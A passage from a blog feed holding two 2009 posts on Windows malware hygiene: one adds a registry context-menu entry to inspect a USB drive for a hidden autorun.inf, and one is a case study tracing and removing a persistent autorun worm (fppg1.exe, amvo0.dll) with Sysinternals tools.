your removable drive. 
The easiest would be to go to &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Start &gt; Run &gt; J:\autorun.inf&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; where J is the drive letter for your USB drive. If Notepad opens with the contents of the file then the file is obviously present, else Windows will display a location unavailable error. (Note that the Run dialog simply performs the default action for .inf files, which is normally to open them in Notepad; because that association can itself be changed, it is safer to type &lt;b&gt;notepad J:\autorun.inf&lt;/b&gt; explicitly, or &lt;b&gt;type J:\autorun.inf&lt;/b&gt; at a command prompt, so that nothing on the suspect drive is executed.) The other method would be to open a command prompt instance, navigate to the drive and use the &lt;b&gt;attrib&lt;/b&gt; command (or &lt;b&gt;dir /a&lt;/b&gt;, which lists hidden and system files as well) to see the attributes of the files in the root of the drive. If there is an autorun.inf file then you should be curious. If it has the &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;S&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; and &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;H&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; attributes set then you have to be suspicious: Explorer keeps a file carrying both attributes hidden even with "Show hidden files" enabled, unless "Hide protected operating system files" is also unchecked in Folder Options, which is why the command prompt gives the more reliable view.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Now that’s time consuming, 
some would say. I agree. Hence to ease my pain, I modified the right click menu of the drives using the Windows registry and added an option to view the attributes of files in the root of the drive. &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlXpOjl5k6I/AAAAAAAAALA/sfIm2_DkERg/s1600-h/3.PNG"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlXpOjl5k6I/AAAAAAAAALA/sfIm2_DkERg/s400/3.PNG" alt="" id="BLOGGER_PHOTO_ID_5356443768108716962" style="cursor: pointer; width: 294px; height: 400px;" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Here’s how:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Open the Windows Registry Editor by going to &lt;/span&gt;&lt;/span&gt;&lt;b&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Start &gt; Run &gt; regedit&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet 
ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Navigate to &lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;HKEY_CLASSES_ROOT\Drive\shell&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; using the left hand side tree structure. Right click on shell and select New &gt; Key. Name the key as anything you want. Right click on the Default value on th&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;e right h&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;and side under the new key you just created and select Modify. Change the Value data in the text box provided to any string that you want to see in the right click menu of the drives. Click on OK. 
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlXpOxOoPlI/AAAAAAAAALI/iyJAc81iv3E/s1600-h/4.PNG"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlXpOxOoPlI/AAAAAAAAALI/iyJAc81iv3E/s400/4.PNG" alt="" id="BLOGGER_PHOTO_ID_5356443771769208402" style="cursor: pointer; width: 400px; height: 154px;" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img4&gt;&lt;/img4&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Right click the new key that you created and create another key below it and name it to command. 
Double-click the Default value under the command key and type the following in the Edit String box that pops up:&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'courier new';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;cmd /k echo Showing File Attributes &amp;amp;&amp;amp; pushd "%1" &amp;amp;&amp;amp; attrib &amp;amp;&amp;amp; type autorun.inf &amp;amp;&amp;amp; echo . &amp;amp;&amp;amp; pause &amp;amp;&amp;amp; exit&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlXpPKpAxoI/AAAAAAAAALQ/sIelszNql6c/s1600-h/5.PNG"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlXpPKpAxoI/AAAAAAAAALQ/sIelszNql6c/s400/5.PNG" alt="" id="BLOGGER_PHOTO_ID_5356443778590754434" style="cursor: pointer; width: 400px; height: 168px;" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  
style="font-size:small;"&gt;&lt;img5&gt;&lt;/img5&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;Select OK and close the registry editor. If everything was done as explained above, then you should have another option in the right click menu of the drives in My Computer. The new option now created will allow you to see the attributes of the files and their names in the root of the drive and the contents of the autorun.inf file if it exists, without opening the drive itself. The command prompt window will close when any key is pressed.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img6&gt;&lt;/img6&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlZTRXe9z9I/AAAAAAAAALY/VFO_LikYmGc/s1600-h/6.PNG"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;img style="cursor: pointer; width: 400px; height: 185px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlZTRXe9z9I/AAAAAAAAALY/VFO_LikYmGc/s400/6.PNG" alt="" id="BLOGGER_PHOTO_ID_5356560364630560722" border="0" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span 
class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;As the autorun.inf file provides the name of the executable, you can easily delete it using the path from the autorun.inf file. If the executable also has the S and H attributes set then use attrib -s -h -r &lt;/span&gt;&lt;/span&gt;&lt;executable&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; to remove the attributes and then a simple del &lt;/span&gt;&lt;/span&gt;&lt;executable&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt; would delete the file. You could then delete the autorun.inf file by removing its attributes through the command prompt and then deleting it using the delete command. 
Safely remove the USB drive and reinsert it to complete the task.&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/executable&gt;&lt;/executable&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;This Microsoft knowledgebase article provides an excellent procedure to disable autorun completely: &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://support.microsoft.com/kb/967715"&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;http://support.microsoft.com/kb/967715&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;span class="Apple-style-span"  style="font-size:small;"&gt;USB removable drive cleaned, without an antivirus. Time for some coffee.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;b&gt;Update:&lt;/b&gt; Download the driveattrib.zip file using the link given below. Extract the driveattrib.reg file and double click it to add the contents to the Windows Registry to automate the entire process. Click on &lt;b&gt;Yes&lt;/b&gt; when presented with a dialog box asking for confirmation. 
&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms';"&gt;&lt;a href="http://riyazahemed.webng.com/driveattrib.zip"&gt;&lt;b&gt;Download the file here.&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span"  style="font-family:'trebuchet ms',fantasy;"&gt;&lt;span class="Apple-style-span"  style="font-size:medium;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-5262776499673439517?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/5262776499673439517/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/07/usb-drives-and-autoruninf.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/5262776499673439517'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/5262776499673439517'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/07/usb-drives-and-autoruninf.html' title='USB Drives and the Autorun.inf'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_17JNeVdiZ7k/SlXpOcT2ncI/AAAAAAAAAKw/q-Q-h0kTYIo/s72-c/1.PNG' height='72' 
width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4333330172780240225.post-7987372979377975607</id><published>2009-07-07T01:20:00.000-07:00</published><updated>2009-07-09T13:32:35.441-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Sysinternals'/><category scheme='http://www.blogger.com/atom/ns#' term='malware'/><category scheme='http://www.blogger.com/atom/ns#' term='fppg1'/><category scheme='http://www.blogger.com/atom/ns#' term='Windows'/><category scheme='http://www.blogger.com/atom/ns#' term='Case Study'/><category scheme='http://www.blogger.com/atom/ns#' term='process explorer'/><category scheme='http://www.blogger.com/atom/ns#' term='amvo.exe'/><title type='text'>The Case of the Persistent Executable</title><content type='html'>This is the first of the 2 case studies which won me a signed copy of Windows Internals, 4th Edition, by Mark Russinovich, Microsoft last year.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I woke up last Saturday around 11:00 in the morning to find my friend sitting at the computer typing some document in MSWord, he then minimized the document and proceeded to open the D: drive from My Computer. My usually fast Windows responded extremely slowly to the double click. I sat bolt upright in my bed and asked him to repeat the procedure with the other drives. The same delay was noticed on the other drives too. I then asked him to right click on any drive expecting a change in the context menu due to the presence of an autorun file. The menu was intact. I then got down and sat at the chair and used the attrib command at the prompt for each drive. 
This is what I got.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlMXAktjcLI/AAAAAAAAAJo/U-6QOALAQjc/s1600-h/1.JPG"&gt;&lt;img style="cursor: pointer; width: 324px; height: 128px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlMXAktjcLI/AAAAAAAAAJo/U-6QOALAQjc/s400/1.JPG" alt="" id="BLOGGER_PHOTO_ID_5355649680495833266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;span style=";font-family:trebuchet ms;font-size:100%;"  &gt;Certainly signs of malicious presence. I used the type command to read the contents of autorun.inf although I knew what it would point at.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlMXAxsBmLI/AAAAAAAAAJw/Nd-E71SQzUw/s1600-h/2.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 162px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlMXAxsBmLI/AAAAAAAAAJw/Nd-E71SQzUw/s400/2.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649683979081906" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I then immediately fired Process Explorer to see if the process was running. Failing to find the process or a handle to it, I then used attrib -s -h -r fppg1.exe to reset the attributes and proceeded to delete it using del fppg1.exe. I repeated the same procedure with the autorun.inf file. 
Since I have 6 partitions on my hard drive, I wrote a bat file, named it clean.bat and saved it in %systemroot% with the following contents.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;@echo off&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;attrib -s -h -r fppg1.exe&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;del fppg1.exe&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;attrib -s -h -r autorun.inf&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;del autorun.inf&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;echo All done&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;echo.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I then ran clean.bat from the console on each partition. Happy that my system was back to normal, I restarted explorer to remove the effects of the autorun.inf file on the default open option on the drives. I then proceeded to open F: drive using the double click through My Computer. I was surprised to see the delay occurring again. The attrib command confirmed my doubts. The two files were back. I decided to dump the strings from the fppg1.exe file to see if I could find any clues. 
I ran the strings utility and piped the output to a text file called fppg1.text.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_17JNeVdiZ7k/SlMXBAWTOzI/AAAAAAAAAJ4/v10cE_6jySE/s1600-h/3.PNG"&gt;&lt;img style="cursor: pointer; width: 301px; height: 100px;" src="http://1.bp.blogspot.com/_17JNeVdiZ7k/SlMXBAWTOzI/AAAAAAAAAJ4/v10cE_6jySE/s400/3.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649687914494770" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The file contained loads of ASCII characters and just three APIs that I recognized. That didn’t help much.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlMXBEU4XAI/AAAAAAAAAKA/yh3Af7Yh3Ss/s1600-h/4.PNG"&gt;&lt;img style="cursor: pointer; width: 134px; height: 244px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlMXBEU4XAI/AAAAAAAAAKA/yh3Af7Yh3Ss/s400/4.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649688982281218" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I then fired up Process Monitor to see what process was writing these files to disk. I used two filters with Path contains autorun.inf then include and Path contains fppg1.exe then include. 
I was surprised to see which process was writing, setting attributes and querying information.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlMXBcd3MtI/AAAAAAAAAKI/vc_jgTGkXbE/s1600-h/5.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 254px;" src="http://2.bp.blogspot.com/_17JNeVdiZ7k/SlMXBcd3MtI/AAAAAAAAAKI/vc_jgTGkXbE/s400/5.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649695462404818" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;It wasn’t only explorer.exe that drained my happiness out of me.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlMXMLoC_HI/AAAAAAAAAKQ/C6LMolgp1mI/s1600-h/6.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 222px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlMXMLoC_HI/AAAAAAAAAKQ/C6LMolgp1mI/s400/6.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649879920278642" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I then right clicked on Explorer to view its stack when IRP_MJ_CREATE Operation was performed. 
The stack had one unfamiliar entry.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlMXMWyt-9I/AAAAAAAAAKY/aV0_3Zh25Cs/s1600-h/7.PNG"&gt;&lt;img style="cursor: pointer; width: 396px; height: 400px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlMXMWyt-9I/AAAAAAAAAKY/aV0_3Zh25Cs/s400/7.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649882917829586" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I used the find handle or dll feature of Process Explorer to search for amvo0.dll. The returned results didn’t raise my spirits.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlMXMhoLOUI/AAAAAAAAAKg/Y7wAccxTliA/s1600-h/8.PNG"&gt;&lt;img style="cursor: pointer; width: 400px; height: 210px;" src="http://3.bp.blogspot.com/_17JNeVdiZ7k/SlMXMhoLOUI/AAAAAAAAAKg/Y7wAccxTliA/s400/8.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649885826398530" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;The dll had attached itself to other processes I had opened after restarting explorer. I then opened up cmd, changed to C:\Windows\System32\ and used the attrib command to confirm my suspicions about the attributes of amvo0.dll. 
I wasn’t disappointed.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlMXMsq8y3I/AAAAAAAAAKo/-05fm0IAY1o/s1600-h/9.PNG"&gt;&lt;img style="cursor: pointer; width: 358px; height: 166px;" src="http://4.bp.blogspot.com/_17JNeVdiZ7k/SlMXMsq8y3I/AAAAAAAAAKo/-05fm0IAY1o/s400/9.PNG" alt="" id="BLOGGER_PHOTO_ID_5355649888790825842" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-family:trebuchet ms;"&gt;I suspected that there could be an associated executable also present in the same directory and hence used attrib amv*. With my suspicions confirmed, I used strings.exe to dump strings from amvo.exe and did a file compare with fppg1.txt. Bingo! They were the same files in essence. The DLL amvo0.dll was making explorer.exe and the System process recreate the files fppg1.exe and autorun.inf whenever they were not found in the root of the drives. I used attrib again to remove the system and hidden attributes from amvo.exe and amvo0.dll and deleted amvo.exe through the command prompt. The file amvo0.dll was in memory and hence could not be deleted. One feature missing from Process Explorer that would have really helped me was the ability to unload DLLs, which would have allowed me to delete the file immediately. I used autoruns.exe, another of Sysinternals' creations, and found that amvo.exe had created a registry entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run that caused it to be run at system startup. With the file gone, I restarted my system and then deleted amvo0.dll manually, and fppg1.exe and the autorun.inf file using the bat file.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-family:trebuchet ms;"&gt;Case closed. 
I then went on to start my morning.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4333330172780240225-7987372979377975607?l=www.riyazwalikar.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://www.riyazwalikar.com/feeds/7987372979377975607/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.riyazwalikar.com/2009/07/case-of-persistent-executable.html#comment-form' title='5 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7987372979377975607'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4333330172780240225/posts/default/7987372979377975607'/><link rel='alternate' type='text/html' href='http://www.riyazwalikar.com/2009/07/case-of-persistent-executable.html' title='The Case of the Persistent Executable'/><author><name>Riyaz Ahemed Walikar</name><uri>http://www.blogger.com/profile/10553011445419057597</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='29' height='32' src='http://4.bp.blogspot.com/-MIZDdHYp--E/TmaNnP9_lpI/AAAAAAAAAbg/OrRXb1k0JDM/s220/profile.jpg'/></author><media:thumbnail 